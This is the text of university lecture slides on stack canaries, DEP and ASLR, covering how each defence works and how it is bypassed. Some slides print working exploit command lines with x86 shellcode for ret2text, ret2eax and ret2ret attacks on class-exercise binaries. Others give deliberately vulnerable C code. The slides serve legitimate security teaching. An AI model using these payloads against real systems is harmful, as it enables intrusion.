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Control Flow Hijack Defenses Canaries, DEP, and ASLR

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1 Control Flow Hijack Defenses Canaries, DEP, and ASLR
David Brumley Carnegie Mellon University

2 Control Flow Hijack: Always control + computation
shellcode (aka payload) padding &buf computation control code injection return-to-libc Heap metadata overwrite return-oriented programming ... Same principle, different mechanism

3 Control Flow Hijacks … happen when an attacker gains control of
the instruction pointer. Two common hijack methods: buffer overflows format string attacks also touch on heap-based attacks (do you even want to say it now?)

4 Control Flow Hijack Defenses
Bugs are the root cause of hijacks! Find bugs with analysis tools Prove program correctness Mitigation Techniques: Canaries Data Execution Prevention/No eXecute Address Space Layout Randomization

5 Proposed Defense Scorecard
Aspect Defense Performance Smaller impact is better Deployment Can everyone easily use it? Compatibility Doesn’t break libraries Safety Guarantee Completely secure to easy to bypass *

6 Canary / Stack Cookies detect buffer overflow before a function returns

7 “A”x68 . “\xEF\xBE\xAD\xDE”
#include<string.h> int main(int argc, char **argv) { char buf[64]; strcpy(buf, argv[1]); } Dump of assembler code for function main: 0x080483e4 <+0>: push %ebp 0x080483e5 <+1>: mov %esp,%ebp 0x080483e7 <+3>: sub $72,%esp 0x080483ea <+6>: mov 12(%ebp),%eax 0x080483ed <+9>: mov 4(%eax),%eax 0x080483f0 <+12>: mov %eax,4(%esp) 0x080483f4 <+16>: lea -64(%ebp),%eax 0x080483f7 <+19>: mov %eax,(%esp) 0x080483fa <+22>: call 0x x080483ff <+27>: leave 0x <+28>: ret argv argc return addr caller’s ebp buf (64 bytes) argv[1] %ebp lowest byte of argc is 0; in little endian, that’s the least significant byte %esp 7

8 “A”x68 . “\xEF\xBE\xAD\xDE”
#include<string.h> int main(int argc, char **argv) { char buf[64]; strcpy(buf, argv[1]); } Dump of assembler code for function main: 0x080483e4 <+0>: push %ebp 0x080483e5 <+1>: mov %esp,%ebp 0x080483e7 <+3>: sub $72,%esp 0x080483ea <+6>: mov 12(%ebp),%eax 0x080483ed <+9>: mov 4(%eax),%eax 0x080483f0 <+12>: mov %eax,4(%esp) 0x080483f4 <+16>: lea -64(%ebp),%eax 0x080483f7 <+19>: mov %eax,(%esp) 0x080483fa <+22>: call 0x x080483ff <+27>: leave 0x <+28>: ret 0xDEADBEEF AAAA AAAA… (64 in total) argv argc return addr caller’s ebp buf (64 bytes) argv[1] corrupted overwritten %ebp ShRiKant’s asked: what happened with caller’s ebp? %esp 8

9 StackGuard [Cowen etal. 1998] Idea: prologue introduces a canary word between return addr and locals epilogue checks canary before function returns Wrong Canary => Overflow arg 2 arg 1 return addr caller’s ebp callee-save CANARY locals %ebp %esp

10 gcc Stack-Smashing Protector (ProPolice)
Dump of assembler code for function main: 0x <+0>: push %ebp 0x <+1>: mov %esp,%ebp 0x <+3>: sub $76,%esp 0x <+6>: mov %gs:20,%eax 0x c <+12>: mov %eax,-4(%ebp) 0x f <+15>: xor %eax,%eax 0x <+17>: mov 12(%ebp),%eax 0x <+20>: mov 4(%eax),%eax 0x <+23>: mov %eax,4(%esp) 0x b <+27>: lea -68(%ebp),%eax 0x e <+30>: mov %eax,(%esp) 0x <+33>: call 0x x <+38>: mov -4(%ebp),%edx 0x <+41>: xor %gs:20,%edx 0x <+48>: je 0x <main+55> 0x <+50>: call 0x x <+55>: leave 0x <+56>: ret Compiled with v4.6.1: gcc -fstack-protector -O1 … return addr caller’s ebp CANARY buf (64 bytes) previously it allocates = 72 bytes, now 76 %gs is a reference to another segment (the so called Thread Local Storage (TLS)). This code is moving the value at %gs:20 into ebp-4 in the prologue, which is checked at the epilogue xor sets ZeroFlag => je 10

11 Canary should be HARD to Forge
Terminator Canary 4 bytes: 0,CR,LF,-1 (low->high) terminate strcpy(), gets(), … Random Canary 4 random bytes chosen at load time stored in a guarded page need good randomness terminator canary: won’t terminate memcpy()

12 Canary Scorecard Aspect Canary Performance
several instructions per function time: a few percent on average size: can optimize away in safe functions (but see MS *) Deployment recompile suffices; no code change Compatibility perfect—invisible to outside Safety Guarantee not really… *

13 Bypass: Data Pointer Subterfuge
Overwrite a data pointer first… int *ptr; char buf[64]; memcpy(buf, user1); *ptr = user2; return addr caller’s ebp CANARY ptr buf (64 bytes)

14 struct is fixed; & what about heap?
Canary Weakness Check does not happen until epilogue… func ptr subterfuge C++ vtable hijack exception handler hijack Code Examples: ProPolice puts arrays above others when possible PointGuard SafeSEH SEHOP struct is fixed; & what about heap? Pointguard is Cowan etal 2003 USENIX Security EncodePointer() in Windows Note here for struct references that structs may contain buffers as well. Heap isn’t protected at all with this scheme. VS 2003: /GS

15 What is “Canary”? Wikipedia: “the historic practice of using canaries in coal mines, since they would be affected by toxic gases earlier than the miners, thus providing a biological warning system.”

16 Data Execution Prevention (DEP) / No eXecute (NX)

17 How to defeat exploits? shellcode padding &buf computation + control

18 Data Execution Prevention
shellcode padding &buf CRASH Mark stack as non-executable using NX bit execstack (still a Denial-of-Service attack!)

19 Each memory page is exclusively either writable or executable.
W ^ X shellcode padding &buf CRASH Each memory page is exclusively either writable or executable. (still a Denial-of-Service attack!)

20 DEP Scorecard Aspect Data Execution Prevention Performance
with hardware support: no impact otherwise: reported to be <1% in PaX Deployment kernel support (common on all platforms) modules opt-in (less frequent in Windows) Compatibility can break legitimate programs Just-In-Time compilers unpackers Safety Guarantee code injected to NX pages never execute but code injection may not be necessary… Windows allowed opting-out at runtime

21 Return-to-libc Attack
“/bin/sh” Overwrite return address by address of a libc function setup fake return address and argument(s) ret will “call” libc function No injected code! fake arg 1 fake ret addr &system() caller’s ebp buf (64 bytes)

22 More to come later simple: return-to-libc

23 Address Space Layout Randomization (ASLR)
Assigned Reading: ASLR Smack and Laugh Reference by Tilo Muller

24 Shellcode Shellcode Oops… Address Space Layout Randomization
addr of buf (0xffffd5d8) Randomize! addr of buf (0xffffd5d8) caller’s ebp buf Shellcode 0xffffe3f8 0xffffe428 0xffffd5d8 caller’s ebp buf[63] buf 0xffffd618 Shellcode Note how the address of buf has changed. buf[0] 0xffffd5d8 Oops…

25 ASLR Traditional exploits need precise addresses
stack-based overflows: location of shell code return-to-libc: library addresses Problem: program’s memory layout is fixed stack, heap, libraries etc. Solution: randomize addresses of each region!

26 Running cat Twice Run 1 Run 2
this is on a modern system so brk (heap) is randomized too address perms offset dev inode pathname

27 Memory Program Mapped Stack Base address a Base address b
Base address c Program Code Uninitialized data Initialized data Mapped Heap Dynamic libraries Thread stacks Shared Memory Stack Main stack un-init = bss recorded in object file, but not in binary itself

28 ASLR Randomization Program Mapped Stack a + 16 bit rand r1
b + 16 bit rand r2 c + 24 bit rand r3 Program Code Uninitialized data Initialized data Mapped Heap Dynamic libraries Thread stacks Shared Memory Stack Main stack * ≈ 16 bit random number of 32-bit system. More on 64-bit systems.

29 ASLR Scorecard Aspect Address Space Layout Randomization Performance
excellent—randomize once at load time Deployment turn on kernel support (Windows: opt-in per module, but system override exists) no recompilation necessary Compatibility transparent to safe apps (position independent) Safety Guarantee not good on x32, much better on x64 code injection may not be necessary… PICode => goes through Global Offset Table PIExecutable is weaker, must be executable, not shared library

30 Ubuntu - ASLR ASLR is ON by default [Ubuntu-Security]
cat /proc/sys/kernel/randomize_va_space Prior to Ubuntu 8.10: 1 (stack/mmap ASLR) In later releases: 2 (stack/mmap/brk ASLR) stack/mmap ASLR: since kernel (Ubuntu 6.06) brk ASLR: since kernel (Ubuntu 8.10) exec ASLR: since kernel Position Independent Executable (PIE) with “-fPIE –pie”

31 Non-randomized memory
How to attack with ASLR? Attack Brute Force Non-randomized memory Stack Juggling ret2text Func ptr ret2ret ret2pop GOT Hijacking ret2got

32 Brute Force brute force search Shell code NOP Sled memory
A process is randomized once, e.g. web server

33 Non-randomized memory
How to attack with ASLR? Attack Brute Force Non-randomized memory Stack Juggling ret2text Func ptr ret2ret ret2pop GOT Hijacking ret2got

34 ret2text text section has executable program code
but not typically randomized by ASLR except PIE can hijack control flow to unintended (but existing) program function Figure 7 in reading

35 Same as running “winner” in vuln2 from class exercise
ret2text .text not randomized \x04\x85\x04\x08 AAAAAAAAAAAA ./exploitme $(perl -e 'print "a"x12 . "\x04\x85\x04\x08"') Same as running “winner” in vuln2 from class exercise

36 Function Pointer Subterfuge
Overwrite a function pointer to point to: program function (similar to ret2text) another lib function in Procedure Linkage Table /*please call me!*/ int secret(char *input) { … } int chk_pwd(char *intput) { … } int main(int argc, char *argv[]) { int (*ptr)(char *input); char buf[8]; ptr = &chk_pwd; strncpy(buf, argv[1], 12); printf("[] Hello %s!\n", buf); (*ptr)(argv[2]); }

37 Function Pointers AAAAAAAA \x04\x85\x04\x08
./exploitme $(perl -e 'print "a"x8 . "\x04\x85\x04\x08"') abc AAAAAAAA

38 Non-randomized memory
How to attack with ASLR? Attack Brute Force Non-randomized memory Stack Juggling ret2text Func ptr ret2ret ret2pop GOT Hijacking ret2got

39 ret2eax returns pointer to buf in eax
void msglog(char *input) { char buf[64]; strcpy(buf, input); } int main(int argc, char *argv[]) { if(argc != 2) { printf("exploitme <msg>\n"); return -1; msglog(argv[1]); return 0; A subsequent call *eax would redirect control to buf

40 ret2eax Disassemble to find call *eax SHELLCODE ……………………...
./exploitme $(perl -e 'print "\x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x50\x68\x6b\x6b\x65\x79\x89\xe2\x42\x50\x52\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" . "\x90"x33 . "\xcf\x83\x04\x08"') Overwrite with address of call *eax void msglog(char *input) { char buf[64]; strcpy(buf, input); }

41 ret2ret “stack juggling”
If there is a valuable (potential shellcode) pointer on a stack, you might consider this technique. 0x00 shellcode (usually resides in buf, but how to point there?) &ret &ret &ret ret = pop eip; jmp eip; This sort of technique is called stack juggling sometimes. It’s not always applicable. We overwrite with the address of a ‘ret’ instruction. Note this is possible because 1) .text is not randomized, and 2) every program contains a ret. The &ret here means the address of a return. When the function return, ret = pop eip, jmp eip, walking up the stack. Finally we jump to the address of the shellcode. Note that it overwrites the low-order byte. If the pointer already points to shellcode, this is a point of imprecision. note it may help out as well, e.g., the overwritten pointer does not point to shellcode. in this case, the NULL will make the address smaller, potentially making it point to shellcode (that is the 0x00 animation). esp overwrite “stack juggling”

42 ret2ret (stack juggling)
You might consider this technique when Text section isn’t randomized (uses addr of ret instr) Can overwrite pointer ptr that points to stack ptr is higher on the stack than vuln buffer no &no ... saved ret saved ebp buffer void f(char *str) { char buffer[256]; strcpy(buffer, str); } int main(int argc, char *argv[]) { int no = 1; int *ptr = &no; f(argv[1]); This is an example program for which ret2ret is possible. You overwrite everything from the ret address up to &no with the address of a ret instruction. You will overwrite the least significant byte of &no with a null. This will mean &no points down on the stack (towards buffer). The final ret (just before &no on the stack) will cause control to be transferred to buf.

43 ret2pop If there is a valuable (potential shellcode) pointer on a stack, you might consider this technique. shellcode (assume perfected) 0x00 &pop-ret &ret ret2pop is a variant where we can skip over the NULL byte problem mentioned in ret2ret. esp overwrite

44 ret2ret / ret2pop AAAA………………... pop - ret ret
&msg ➠ You can use either &msg or &user_id to point the shellcode. It depends on your strategy. pop - ret ret ./exploitme $(perl -e 'print "\xe3\x84\x04\x08"x18 . "\x73\x85\x04\x08"') $(perl -e 'print "\x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x50\x68\x6b\x6b\x65\x79\x89\xe2\x42\x50\x52\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"') ./exploitme $(perl -e 'print "\x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x50\x68\x6b\x6b\x65\x79\x89\xe2\x42\x50\x52\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" . "\x90"x33 . "\x73\x85\x04\x08"') foo AAAA………………...

45 Non-randomized memory
How to attack with ASLR? Attack Brute Force Non-randomized memory Stack Juggling ret2text Func ptr ret2ret ret2pop GOT Hijacking ret2got

46 Other Non-randomized Sections
Dynamically linked libraries are loaded at runtime. This is called lazy binding. Two important data structures Global Offset Table Procedure Linkage Table commonly positioned statically at compile-time

47 Transfer control to PLT entry of printf
Dynamic Linking ... printf(“hello ”); printf(“world\n”); jmp GOT[printf] Transfer control to PLT entry of printf Linker GOT ... <printf>: dynamic_linker_addr LIBC <dynamic_printf_addr>: ...

48 Linker fills in the actual addresses of library functions
Dynamic Linking ... printf(“hello ”); printf(“world\n”); jmp GOT[printf] GOT ... <printf>: dynamic_printf_addr Linker fills in the actual addresses of library functions Linker LIBC <dynamic_printf_addr>: ...

49 Subsequent calls to printf do not require the linker
Dynamic Linking ... printf(“hello ”); printf(“world\n”); jmp GOT[printf] GOT ... <printf>: dynamic_printf_addr Subsequent calls to printf do not require the linker Linker LIBC <dynamic_printf_addr>: ...

50 Exploiting the linking process
GOT entries are really function pointers positioned at known addresses Idea: use other vulnerabilities to take control (e.g., format string)

51 Use the format string to overwrite a GOT entry
GOT Hijacking ... printf(usr_input); printf(“world\n”); jmp GOT[printf] GOT ... <printf>: dynamic_linker_addr Use the format string to overwrite a GOT entry Linker LIBC <dynamic_printf_addr>: ...

52 Use the format string to overwrite a GOT entry
GOT Hijacking ... printf(usr_input); printf(“world\n”); jmp GOT[printf] GOT ... <printf>: any_attacker_addr Use the format string to overwrite a GOT entry Linker LIBC <dynamic_printf_addr>: ...

53 GOT Hijacking Linker LIBC
... printf(usr_input); printf(“world\n”); jmp GOT[printf] GOT ... <printf>: any_attacker_addr The next invocation transfers control wherever the attacker wants (e.g., system, pop-ret, etc) Linker LIBC <dynamic_printf_addr>: ...

54 Non-randomized memory
How to attack with ASLR? Attack Brute Force Non-randomized memory Stack Juggling ret2text Func ptr ret2ret ret2pop GOT Hijacking ret2got

55 Many other techniques ret2bss, ret2data, ret2heap, ret2eax
string pointer ret2dtors overwriting dtors section

56 The Security of ASLR Optional Reading:
On the Effectiveness of Address-Space Randomization by Shacham et al, ACM CCS 2004

57 ~ 27 bits between bffeb000, b7ffee00. Top 4 not touched by PAX.
$ /bin/cat /proc/self/maps f000 r-xp : /bin/cat 0804f rw-p : /bin/cat rw-p : [heap] b7d3b000-b7e75000 r--p : /usr/lib/locale/locale-archive b7e75000-b7e76000 rw-p b7e :00 0 b7e76000-b7fcb000 r-xp : /lib/i686/cmov/ b7fcb000-b7fcc000 r--p : /lib/i686/cmov/ b7fcc000-b7fce000 rw-p : /lib/i686/cmov/ b7fce000-b7fd1000 rw-p b7fce000 00:00 0 b7fe1000-b7fe3000 rw-p b7fe :00 0 b7fe3000-b7fe4000 r-xp b7fe : [vdso] b7fe4000-b7ffe000 r-xp : /lib/ b7ffe000-b rw-p 0001a000 08: /lib/ bffeb000-c rw-p bffeb000 00: [stack] ~ 27 bits between bffeb000, b7ffee00. Top 4 not touched by PAX. < ~24 bits of randomness. Shacham et al report 16 bits in reality for x86 on Linux.

58 When to Randomize? When the machine starts? (Windows)
Assign each module an address once per boot When a process starts? (Linux) Constant re-randomization for all child processes Randomize!

59 Security Game for ASLR Attempted attack with randomization guess x is “a probe” Success = x is correct Failure = detectable crash or fail to exploit Assume 16 bits of randomness available for ASLR Game: In expectation, how many probes are necessary to guess x? Scenario 1: not randomized after each probe (Windows) Scenario 2: re-randomized after each probe (Linux) ----- Meeting Notes (1/31/12 20:41) ----- Swap 1 and 2

60 What is the expected number of probes to hack the machine?
1. Pr[Success on exactly trial n]? 2. Pr[Success by trial n]?

61 Scenario 1: Not Randomized After Each Probe
Pretend that each possible offset is written on a ball. There are 216 balls. This scenario is like selecting balls without replacement until we get the ball with the randomization offset written on it. 9 1 Correct Offset 4 7 2 3 8

62 W/O Replacement: Pr[Success on Exactly nth try]
Fail, Probe 4 Success Fail, Probe 3 Fail, Probe 2 Success Probe 1 Success

63 W/O Replacement: Pr[Success on Exactly nth try]
Succeed on nth trial Fail the first n-1 times ----- Meeting Notes (1/31/12 20:41) ----- Titles

64 W/O Replacement: Pr[Success by nth try]
Fail, Probe 4 Success Fail, Probe 3 Fail, Probe 2 Pr[Success by 2nd try] = Pr[success exact 1st]+ Pr[success exact 2nd] Success Probe 1 Success

65 W/O Replacement: Pr[Success by nth try] =
Pr[Success on 1st try] + Pr[Success on 2nd try] + Pr[Success on nth try] =

66 Expected Value E[X] is the expected value of random variable X
Basically a weighted average

67 Expected number of trials before success
Pr[success by nth try] n*2^16 is the probability of succeeding by n trials Sum of 1 to n is n(n+1)/2 2^16*(2^16+1) / (2 * 2^16) = 2^ / 2

68 Scenario 2: Randomized After Each Probe
Pretend that each possible offset is written on a ball. There are 216 balls. Re-randomizing is like selecting balls with replacement until we get the ball with the randomization offset written on it. 9 1 Correct Offset 4 7 2 3 8

69 With Replacement Pr[Success on exactly nth try]
Fail, Probe 4 Success Fail, Probe 3 Success Fail, Probe 2 Fail n-1 times and success on nth trial: Note that probability of failure is (2^16 – 1) / 2^16, or 1 – 2^16. So, (1-2^16)^n-1 * 1/(2^16) Success Geometric dist. p= Probe 1 Success

70 With Replacement: Expected number of probes: 1/p = E[X] = 1/p for geometric distribution p=

71 Re-Randomization gives (only)1 bit of extra security!
Comparison Expected success in 216 probes Expected success in 215 probes With Re-Randomization Without Re-Randomization For n bits of randomness: 2n For n bits of randomness: 2n-1 Re-Randomization gives (only)1 bit of extra security!

72 That’s true, but is brute force the only attack?
But wait... That’s true, but is brute force the only attack? No, information disclosure is huge. On Windows an information disclosure with a buffer overflow = game over, while with linux maybe not.

73 Questions?

74 END

75 Backup slides here. Titled cherries because they are for the pickin. (credit due to maverick for wit)

76 Control flow hijacks are due to BUGS!
Last Two Lectures Control flow hijacks are due to BUGS! #include <stdio.h> #include <stdarg.h> #include <string.h> void vuln1(char *input) { char buf[48]; snprintf(buf, 48, "%s.\n", input); buf[47] = 0; printf(buf); // FORMAT STRING ATTACK return; } void vuln2(char *input) { char buf[32]; memset(buf, 0, sizeof(buf));; if((input[0] % 2) == 0) { strcpy(buf, input); // BUFFER OVERFLOW printf("vuln2: correct format: %s\n", buf); } else { printf("vuln1: incorrect format: %s\n", input); //... void winner() { printf("You win!\n"); } int main(int argc, char *argv[]) { if(argc != 3){ printf("%s [1|2] <input>\n", argv[0]); return 0; switch(atoi(argv[1])){ case 1: vuln1(argv[2]); break; case 2: vuln2(argv[2]); break; return; Two things: BUGs

77 Format String Attacks Microsoft took a drastic measure:

78 %n is disabled by default
since VS 2005 int _set_printf_count_output( int enable ); -Wformat-security If -Wformat is specified, also warn about uses of format functions that represent possible security problems. At present, this warns about calls to printf and scanf functions where the format string is not a string literal and there are no format arguments, as in printf (foo);. This may be a security hole if the format string came from untrusted input and contains `%n'. (This is currently a subset of what -Wformat-nonliteral warns about, but in future warnings may be added to -Wformat-security that are not included in -Wformat-nonliteral.)

79 Hardware Support x86 can enforce NX bit since Pentium 4

80 DEP Support Linux Windows Modules must opt-in
older compiler does not often turned-off in OS level “Software DEP” is really SafeSEH Modules must opt-in most do by default Can emulate in software using segments

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